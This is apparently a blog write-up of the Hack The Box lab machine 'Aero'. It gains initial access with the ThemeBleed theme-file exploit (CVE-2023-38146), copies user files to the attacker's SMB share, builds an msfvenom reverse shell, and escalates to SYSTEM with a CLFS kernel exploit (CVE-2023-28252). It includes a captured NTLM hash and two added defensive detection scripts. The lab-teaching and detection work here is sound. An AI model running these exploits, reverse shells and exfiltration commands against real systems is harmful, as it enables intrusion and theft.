Aero-htb-writeup

0x00 Lab skills overview

Skills covered in this chapter: editing web page elements in the browser inspector, CVE-2023-38146, sensitive-information enumeration, CVE-2023-28252

Reference links: none

0x01 Obtaining user-level access

1. Get the target IP address: 10.10.11.237

2. Enumerate the target's open ports:

```text
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports1 10.10.11.237
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-23 18:53 CST
Nmap scan report for 10.10.11.237
Host is up (0.47s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 15.74 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p80 --min-rate=10000 10.10.11.237 -sC -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-23 18:54 CST
Nmap scan report for 10.10.11.237
Host is up (0.32s latency).

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Aero Theme Hub
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.04 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.11.237 -sU
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-23 19:01 CST
Nmap scan report for 10.10.11.237
Host is up (0.31s latency).
All 65535 scanned ports on 10.10.11.237 are in ignored states.
Not shown: 65535 open|filtered udp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 16.74 seconds
```

3. It really does expose only this one port, so this will be a tough one; the machine is from 2023, so it is fairly recent. Let's have a look at port 80.

http://10.10.11.237/

4. The page shows a domain name, so bind it in the local hosts file first

support@aerohub.htb

```text
┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.237 aerohub.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.11.237 aerohub.htb
```

5. Looking at the page source reveals a hidden, commented-out line

6. Removing the comment makes an extra function button appear on the site

7. Further analysis confirms that the site only accepts uploads of Windows theme files: "Upload your custom theme here!"

https://learn.microsoft.com/zh-cn/windows/win32/controls/themesfileformat-overview

8. Following the usual routine for a new box, search directly for related vulnerabilities

https://www.bleepingcomputer.com/news/security/windows-11-themebleed-rce-bug-gets-proof-of-concept-exploit/

https://www.threatdown.com/blog/themebleed-exploit-is-another-reason-to-patch-windows-quickly/

https://github.com/exploits-forsale/themebleed

https://github.com/Jnnshschl/CVE-2023-38146

https://jnns.de/posts/cve-2023-38146-poc/

> Kirkpatrick discovered the vulnerability while looking at "weird Windows file formats", one of which is .THEME, used to customize the appearance of the operating system.
>
> These files contain references to ".msstyles" files, which are not supposed to contain any code, only graphical resources that are loaded when the theme file that calls them is opened.
>
> The researcher noticed that when version number "999" is used, the routine that handles .MSSTYLES files has a large gap between the time the DLL ("_vrf.dll") signature is verified and the time the library is loaded, creating a race condition.
>
> Using a specially crafted .MSSTYLES, an attacker can exploit the race window to replace the verified DLL with a malicious one, allowing them to run arbitrary code on the target machine.
>
> Kirkpatrick created a PoC exploit that opens the Windows calculator when the user launches the theme file.
>
> The researcher also noted that downloading a theme file from the web triggers a "mark-of-the-web" warning, which could alert the user to the threat. However, this warning can be bypassed if the attacker wraps the theme in a .THEMEPACK file (a CAB archive).
>
> When the CAB file is launched, the theme it contains opens automatically without showing the mark-of-the-web warning.
>
> Microsoft fixed the issue by removing the "version 999" feature entirely. However, Kirkpatrick says the underlying race condition still exists. In addition, Microsoft did not address the missing mark-of-the-web warning for theme pack files.
>
> Windows users are advised to apply Microsoft's September 2023 security update as soon as possible, since it fixes two zero-day vulnerabilities that are being actively exploited, along with another 57 security issues in various applications and system components.
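The article above describes the delivery vector: a .theme file whose visual style entry points at an .msstyles file on an attacker-controlled SMB share, which is exactly what the PoC's SMB server hands out later in this write-up. As an added, defender-side example (not part of the original write-up and not the PoC's code), the following Python script parses .theme files, which are INI files per the Microsoft documentation linked in step 7, and flags any visual style that would be fetched over a UNC path or from outside the Windows themes directory. The sample theme texts are constructed, the 203.0.113.5 address is a documentation placeholder, and the list of trusted directories is an assumption.

```python
"""Added example: flag .theme files whose visual style would be loaded from a
network share (the ThemeBleed delivery vector). Not from the original
write-up or the PoC; section/key names follow the .theme file format docs."""
import configparser
import re
import sys
from typing import Dict, List, Optional

# A UNC path: \\host\share\...  (forward slashes tolerated after the host)
UNC_RE = re.compile(r"^\s*\\\\[^\\/]+[\\/]")
# Where Windows keeps its own visual styles (assumption: both spellings occur).
TRUSTED_DIRS = ("%systemroot%\\resources\\themes\\", "\\windows\\resources\\themes\\")


def parse_theme(text: str) -> configparser.ConfigParser:
    """A .theme file is an INI file. Interpolation is off because values contain
    '%' (e.g. %SystemRoot%); strict mode is off because duplicate keys occur."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, allow_no_value=True)
    cp.read_string(text)
    return cp


def _section(cp: configparser.ConfigParser, name: str) -> Optional[configparser.SectionProxy]:
    """Case-insensitive section lookup ([VisualStyles] vs [visualstyles])."""
    for sec in cp.sections():
        if sec.lower() == name.lower():
            return cp[sec]
    return None


def scan_theme_text(text: str) -> List[Dict[str, str]]:
    """Return findings for one .theme file; an empty list means nothing suspicious."""
    cp = parse_theme(text)
    findings: List[Dict[str, str]] = []

    vs = _section(cp, "VisualStyles")
    path = (vs.get("path") or "").strip() if vs is not None else ""
    if path:
        if UNC_RE.match(path):
            # The .msstyles and its *_vrf.dll companion would be fetched over SMB.
            findings.append({"kind": "unc_msstyles", "section": "VisualStyles",
                             "key": "Path", "value": path})
        elif not any(t in path.lower() for t in TRUSTED_DIRS):
            findings.append({"kind": "msstyles_outside_windows_themes",
                             "section": "VisualStyles", "key": "Path", "value": path})

    # Other keys (wallpaper, cursors, sounds) can also point at a share; not the
    # ThemeBleed vector itself, but still an outbound SMB connection on open.
    for sec in cp.sections():
        if sec.lower() == "visualstyles":
            continue
        for key, value in cp[sec].items():
            if value and UNC_RE.match(value):
                findings.append({"kind": "unc_reference", "section": sec,
                                 "key": key, "value": value.strip()})
    return findings


def scan_theme_file(filename: str) -> List[Dict[str, str]]:
    """Themes saved by Windows are usually UTF-16 with a BOM; else assume UTF-8."""
    with open(filename, "rb") as fh:
        raw = fh.read()
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        text = raw.decode("utf-16")
    else:
        text = raw.decode("utf-8-sig", errors="replace")
    return scan_theme_text(text)


# Constructed sample: visual style served from a remote share (203.0.113.5 is a
# documentation address, not a real host).
SUSPICIOUS_THEME = r"""[Theme]
DisplayName=Custom Theme

[VisualStyles]
Path=\\203.0.113.5\share\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""

# Constructed sample: the stock Aero style from under %SystemRoot%.
BENIGN_THEME = r"""[Theme]
DisplayName=@%SystemRoot%\System32\themeui.dll,-2013

[Control Panel\Desktop]
Wallpaper=%SystemRoot%\web\wallpaper\Windows\img0.jpg

[VisualStyles]
Path=%SystemRoot%\resources\Themes\Aero\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""

if __name__ == "__main__":
    if sys.argv[1:]:
        for name in sys.argv[1:]:
            print(name, scan_theme_file(name))
    else:
        print("suspicious:", scan_theme_text(SUSPICIOUS_THEME))
        print("benign:", scan_theme_text(BENIGN_THEME))
```

Run it with one or more .theme paths (for example the contents of an upload directory such as the one this site exposes) to get a finding list per file, or with no arguments to see the two constructed samples. A UNC finding means opening the theme would make the host talk SMB to that address, which is the behaviour worth blocking at the egress firewall regardless of whether the race itself is patched.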

9. The search above also turned up a ready-made exploit tool, so let's use it directly

https://github.com/Jnnshschl/CVE-2023-38146

```text
┌──(kali㉿offsec)-[~/Desktop/CVE-2023-38146]
└─$ python3 themebleed.py -r 10.10.14.45 -p 443
2024-05-23 20:00:59,116 INFO> ThemeBleed CVE-2023-38146 PoC [https://github.com/Jnnshschl]
2024-05-23 20:00:59,116 INFO> Credits to -> https://github.com/gabe-k/themebleed, impacket and cabarchive

2024-05-23 20:00:59,582 INFO> Compiled DLL: "./tb/Aero.msstyles_vrf_evil.dll"
2024-05-23 20:00:59,582 INFO> Theme generated: "evil_theme.theme"
2024-05-23 20:00:59,582 INFO> Themepack generated: "evil_theme.themepack"

2024-05-23 20:00:59,582 INFO> Remember to start netcat: rlwrap -cAr nc -lvnp 443
2024-05-23 20:00:59,582 INFO> Starting SMB server: 10.10.14.45:445

2024-05-23 20:00:59,583 INFO> Config file parsed
2024-05-23 20:00:59,583 INFO> Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
2024-05-23 20:00:59,583 INFO> Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
2024-05-23 20:00:59,583 INFO> Config file parsed
2024-05-23 20:00:59,583 INFO> Config file parsed
2024-05-23 20:03:26,975 INFO> Incoming connection (10.10.11.237,57488)
2024-05-23 20:03:29,285 INFO> AUTHENTICATE_MESSAGE (AERO\sam.emerson,AERO)
2024-05-23 20:03:29,285 INFO> User AERO\sam.emerson authenticated successfully
2024-05-23 20:03:29,285 INFO> sam.emerson::AERO:aaaaaaaaaaaaaaaa:a59c0827f51cb03abfc707485f9a7e6a:01010000000000000028cb3809adda01c1333edd746bab5600000000010010004e0044006f0079005300490065005300030010004e0044006f0079005300490065005300020010004d00470041004400450078004d006100040010004d00470041004400450078004d006100070008000028cb3809adda0106000400020000000800300030000000000000000000000000200000a1c60778e59e0ea7e694b7d64db502ceb8abf35fcd0e77d8a8f2e56c4922410a0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340035000000000000000000
2024-05-23 20:03:29,563 INFO> Connecting Share(1:IPC$)
2024-05-23 20:03:30,211 INFO> Connecting Share(2:tb)
2024-05-23 20:03:31,061 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 1]
2024-05-23 20:03:34,386 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 1]
2024-05-23 20:03:41,389 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 7]
2024-05-23 20:03:42,247 INFO> Disconnecting Share(1:IPC$)
2024-05-23 20:03:44,618 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 5]
2024-05-23 20:03:55,400 WARNING> Stage 2/3: "Aero.msstyles_vrf.dll" [shareAccess: 7]
2024-05-23 20:03:57,513 WARNING> Stage 2/3: "Aero.msstyles_vrf.dll" [shareAccess: 1]
2024-05-23 20:04:40,562 WARNING> Stage 2/3: "Aero.msstyles_vrf.dll" [shareAccess: 7]
2024-05-23 20:04:46,921 WARNING> Stage 3/3: "Aero.msstyles_vrf.dll" [shareAccess: 5]
```

```text
┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap -cAr nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.11.237] 57489
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
aero\sam.emerson
PS C:\Windows\system32>
```

10. We now have an initial shell; read the first flag

```text
PS C:\Windows\system32> cd C:/Users/sam.emerson/Desktop
cd C:/Users/sam.emerson/Desktop
PS C:\Users\sam.emerson\Desktop> dir
dir


Directory: C:\Users\sam.emerson\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/22/2024 7:45 PM 34 user.txt


PS C:\Users\sam.emerson\Desktop> cat user.txt
cat user.txt
bbba5b00a1cf7964dab9fe678f6526c9
PS C:\Users\sam.emerson\Desktop>
```

0x02 Obtaining SYSTEM-level access

11. After a good deal of manual enumeration, a PDF and a script file turned up in the current user's profile

```text
PS C:\Users\sam.emerson> tree /F /A
tree /F /A
Folder PATH listing
Volume serial number is C009-0DB2
C:.
+---Contacts
+---Desktop
| user.txt
|
+---Documents
| CVE-2023-28252_Summary.pdf
| watchdog.ps1
|
+---Downloads
+---Favorites
| | Bing.url
| |
| \---Links
+---Links
| Desktop.lnk
| Downloads.lnk
|
+---Music
+---OneDrive
+---Pictures
| +---Camera Roll
| \---Saved Pictures
+---Saved Games
+---Searches
| winrt--{S-1-5-21-3555993375-1320373569-1431083245-1001}-.searchconnector-ms
|
\---Videos
PS C:\Users\sam.emerson>
```

12. Here I simply reuse the SMB server that the exploit above set up and copy the files over to it

```text
PS C:\Users\sam.emerson> cd Documents
cd Documents
PS C:\Users\sam.emerson\Documents> dir
dir


Directory: C:\Users\sam.emerson\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/21/2023 9:18 AM 14158 CVE-2023-28252_Summary.pdf
-a---- 9/26/2023 1:06 PM 1113 watchdog.ps1


PS C:\Users\sam.emerson\Documents> copy ./CVE-2023-28252_Summary.pdf \\10.10.14.45\tb\CVE-2023-28252_Summary.pdf
copy ./CVE-2023-28252_Summary.pdf \\10.10.14.45\tb\CVE-2023-28252_Summary.pdf
PS C:\Users\sam.emerson\Documents> copy ./watchdog.ps1 \\10.10.14.45\tb\watchdog.ps1
copy ./watchdog.ps1 \\10.10.14.45\tb\watchdog.ps1
PS C:\Users\sam.emerson\Documents>
```

13. Analysis shows this is a vulnerability advisory asking for a patch to be applied

> CVE-2023-28252 Summary: Vulnerability type: privilege escalation. Target component: Common Log File System (CLFS). Risk level: critical. Exploitation date: since February 2022. Patch released by Microsoft: April 2023.
>
> Background: The Nokoyawa ransomware group has been active since February 2022, and it was not until April 2023 that Microsoft released a patch addressing this issue. The vulnerability has been used by attackers as a means of gaining unauthorized access to Windows systems, so we must apply the necessary patches to protect our infrastructure. According to Kaspersky's analysis, since June 2022 the Nokoyawa ransomware group has used other exploits targeting the CLFS driver with similar but distinct characteristics, all of which are linked to a single exploit developer.
>
> Required actions: Patch immediately: we strongly recommend applying the security patch Microsoft released for CVE-2023-28252 as soon as possible to mitigate the risk associated with this vulnerability. Failing to do so could leave our servers exposed to potential attacks.
>
> Review and monitoring: In addition to patching, we should conduct a thorough review of our server logs for any signs of suspicious activity or unauthorized access. Continuous monitoring of our server environment is essential to ensuring the security of our systems.
>
> Security awareness: It is vital to remind all team members of the importance of good cyber-hygiene. Encourage the use of strong, unique passwords and two-factor authentication where applicable.
>
> Incident response plan: Make sure our incident response plan is up to date and ready to be activated immediately in the event of any security incident. Timely detection and response are critical to mitigating the impact of a potential attack.

14. We also found the script file that automatically opens the uploaded files....

15. Based on that PDF, we can assume the machine has not yet received this patch, so I start the privilege-escalation exploit here

https://github.com/duck-sec/CVE-2023-28252-Compiled-exe

16. Download the exploit binary

https://github.com/duck-sec/CVE-2023-28252-Compiled-exe/blob/master/exploit.exe

17. Generate the reverse-shell EXE

```text
┌──(kali㉿offsec)-[~/Desktop]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.45 LPORT=4444 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
```

18. Upload it into the current directory, again through the SMB server we used above

```text
PS C:\Users\sam.emerson\Documents> cd ../Desktop
cd ../Desktop
PS C:\Users\sam.emerson\Desktop> copy \\10.10.14.45\tb\exploit.exe .
copy \\10.10.14.45\tb\exploit.exe .
PS C:\Users\sam.emerson\Desktop> dir
dir


Directory: C:\Users\sam.emerson\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/22/2024 11:40 PM 367104 exploit.exe
-ar--- 5/22/2024 7:45 PM 34 user.txt


PS C:\Users\sam.emerson\Desktop> copy \\10.10.14.45\tb\shell.exe .
copy \\10.10.14.45\tb\shell.exe .
PS C:\Users\sam.emerson\Desktop> dir
dir


Directory: C:\Users\sam.emerson\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/22/2024 11:40 PM 367104 exploit.exe
-a---- 5/23/2024 5:43 AM 7168 shell.exe
-ar--- 5/22/2024 7:45 PM 34 user.txt


PS C:\Users\sam.emerson\Desktop>
```

19. Run the exploit to escalate privileges:

```text
PS C:\Users\sam.emerson\Desktop> ./exploit.exe 1208 1 "C:\Users\sam.emerson\Desktop\shell.exe"
./exploit.exe 1208 1 "C:\Users\sam.emerson\Desktop\shell.exe"
Executing command: C:\Users\sam.emerson\Desktop\shell.exe


ARGUMENTS
[+] TOKEN OFFSET 4b8
[+] FLAG 1


VIRTUAL ADDRESSES AND OFFSETS
[+] NtFsControlFile Address --> 00007FF920244240
[+] pool NpAt VirtualAddress -->FFFFA685482FE000
[+] MY EPROCESSS FFFF800EDAFD4140
[+] SYSTEM EPROCESSS FFFF800ED26FC040
[+] _ETHREAD ADDRESS FFFF800ED8114080
[+] PREVIOUS MODE ADDRESS FFFF800ED81142B2
[+] Offset ClfsEarlierLsn --------------------------> 0000000000013220
[+] Offset ClfsMgmtDeregisterManagedClient --------------------------> 000000000002BFB0
[+] Kernel ClfsEarlierLsn --------------------------> FFFFF80251613220
[+] Kernel ClfsMgmtDeregisterManagedClient --------------------------> FFFFF8025162BFB0
[+] Offset RtlClearBit --------------------------> 0000000000343010
[+] Offset PoFxProcessorNotification --------------------------> 00000000003DBD00
[+] Offset SeSetAccessStateGenericMapping --------------------------> 00000000009C87B0
[+] Kernel RtlClearBit --------------------------> FFFFF8024CF43010
[+] Kernel SeSetAccessStateGenericMapping --------------------------> FFFFF8024D5C87B0

[+] Kernel PoFxProcessorNotification --------------------------> FFFFF8024CFDBD00


PATHS
[+] Folder Public Path = C:\Users\Public
[+] Base log file name path= LOG:C:\Users\Public\25
[+] Base file path = C:\Users\Public\25.blf
[+] Container file name path = C:\Users\Public\.p_25
Last kernel CLFS address = FFFFA6853F00F000
numero de tags CLFS founded 9

Last kernel CLFS address = FFFFA68541ED9000
numero de tags CLFS founded 1

[+] Log file handle: 000000000000011C
[+] Pool CLFS kernel address: FFFFA68541ED9000

number of pipes created =5000

number of pipes created =4000
TRIGGER START
System_token_value: 4141414141414141
TRYING AGAIN
TRIGGER START
System_token_value: 4141414141414141
TRYING AGAIN
TRIGGER START
System_token_value: FFFFA6853AC41594
SYSTEM TOKEN CAPTURED
Closing Handle
ACTUAL USER=SYSTEM
```
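The exploit output above names the artifacts this technique leaves behind: a CLFS base log file (C:\Users\Public\25.blf), a container file (C:\Users\Public\.p_25) and thousands of named pipes created in a burst by one process. As an added, defender-side example (not part of the original write-up and not the exploit's code), here is Python detection logic run over constructed Sysmon-style events (Event ID 11 FileCreate and Event ID 17 pipe-created, represented as dicts): it alerts on CLFS log files created under a user profile directory, where no service normally keeps them, and on a single process creating an unusual number of pipes, and raises the severity when both come from the same process. The field names, the pipe threshold and the path/name patterns (derived from the paths printed above) are assumptions to tune against your own telemetry.

```python
"""Added example: spot CVE-2023-28252-style CLFS exploitation artifacts in
constructed Sysmon-style events. Not from the original write-up or the
exploit; the patterns are derived from the paths the exploit printed."""
import re
from collections import Counter
from typing import Dict, Iterable, List, Tuple

# CLFS logs legitimately live in places like C:\Windows\System32\config\TxR;
# a base log (*.blf) or container (.p_*) under a user profile is the anomaly.
USER_WRITABLE_RE = re.compile(r"^[a-z]:\\users\\[^\\]+\\", re.IGNORECASE)
CLFS_ARTIFACT_RE = re.compile(r"(\.blf$|\\\.p_[^\\]*$)", re.IGNORECASE)

PIPE_SPRAY_THRESHOLD = 1000   # assumption: tune to your environment

Key = Tuple[str, int]         # (Image, ProcessId)


def detect(events: Iterable[Dict[str, object]],
           pipe_threshold: int = PIPE_SPRAY_THRESHOLD) -> List[Dict[str, object]]:
    """Return alerts as dicts with kind, severity, image, pid and detail."""
    alerts: List[Dict[str, object]] = []
    pipe_counts: Counter = Counter()
    clfs_writers = set()

    for ev in events:
        eid = int(ev.get("EventID", 0))
        key: Key = (str(ev.get("Image", "")), int(ev.get("ProcessId", 0)))
        if eid == 11:    # FileCreate
            target = str(ev.get("TargetFilename", ""))
            if USER_WRITABLE_RE.match(target) and CLFS_ARTIFACT_RE.search(target):
                clfs_writers.add(key)
                alerts.append({"kind": "clfs_log_in_user_dir", "severity": "medium",
                               "image": key[0], "pid": key[1], "detail": target})
        elif eid == 17:  # PipeEvent: pipe created
            pipe_counts[key] += 1

    sprayers = {k for k, n in pipe_counts.items() if n >= pipe_threshold}
    for key in sprayers:
        alerts.append({"kind": "named_pipe_spray", "severity": "medium",
                       "image": key[0], "pid": key[1],
                       "detail": f"{pipe_counts[key]} pipes created"})

    # Both behaviours from one process is the shape seen in the output above
    # (a pipe burst plus a CLFS log in C:\Users\Public), so escalate it.
    for a in alerts:
        if (a["image"], a["pid"]) in clfs_writers & sprayers:
            a["severity"] = "high"
    return alerts


def build_sample_events() -> List[Dict[str, object]]:
    """Constructed telemetry, not real logs: one exploit-like process plus noise."""
    ex = {"Image": r"C:\Users\alice\Desktop\exploit.exe", "ProcessId": 4212}
    events: List[Dict[str, object]] = [
        {"EventID": 11, "TargetFilename": r"C:\Users\alice\Documents\report.docx",
         "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
         "ProcessId": 3100},
        # Registry transaction logs are .blf too, but under System32 and by System.
        {"EventID": 11, "TargetFilename": r"C:\Windows\System32\config\TxR\{placeholder-guid}.TM.blf",
         "Image": "System", "ProcessId": 4},
        {"EventID": 11, "TargetFilename": r"C:\Users\Public\25.blf", **ex},
        {"EventID": 11, "TargetFilename": r"C:\Users\Public\.p_25", **ex},
        {"EventID": 17, "PipeName": r"\mojo.1234",
         "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "ProcessId": 2200},
    ]
    events += [{"EventID": 17, "PipeName": f"\\spray{i}", **ex} for i in range(5000)]
    return events


if __name__ == "__main__":
    for alert in detect(build_sample_events()):
        print(alert)
```

Feeding real events means mapping your collector's field names onto EventID, Image, ProcessId and TargetFilename; the two file alerts and the pipe-spray alert in the sample all come from the same process and are therefore reported as high. The `.blf` rule is deliberately scoped to user-profile paths so that registry transaction logs under System32, which share the extension, do not trip it.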

20. A high-privilege shell is obtained

```text
┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.11.237] 57493
Microsoft Windows [Version 10.0.22000.1761]
(c) Microsoft Corporation. All rights reserved.

C:\Users\sam.emerson\Desktop>whoami
whoami
nt authority\system

C:\Users\sam.emerson\Desktop>
```

21. Read the flag

```text
C:\Users\sam.emerson\Desktop>cd C:/Users/administrator/Desktop
cd C:/Users/administrator/Desktop

C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is C009-0DB2

Directory of C:\Users\Administrator\Desktop

09/27/2023 04:21 AM <DIR> .
09/20/2023 05:15 AM <DIR> ..
05/22/2024 07:45 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 6,721,974,272 bytes free

C:\Users\Administrator\Desktop>cat root.txt
cat root.txt
'cat' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\Administrator\Desktop>type root.txt
type root.txt
419361783f936ba7ec3ca72cd73bde9e

C:\Users\Administrator\Desktop>
```

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/571


Aero-htb-writeup
https://sh1yan.top/2024/05/24/Aero-htb-writeup/
Author: shiyan
Published: May 24, 2024
License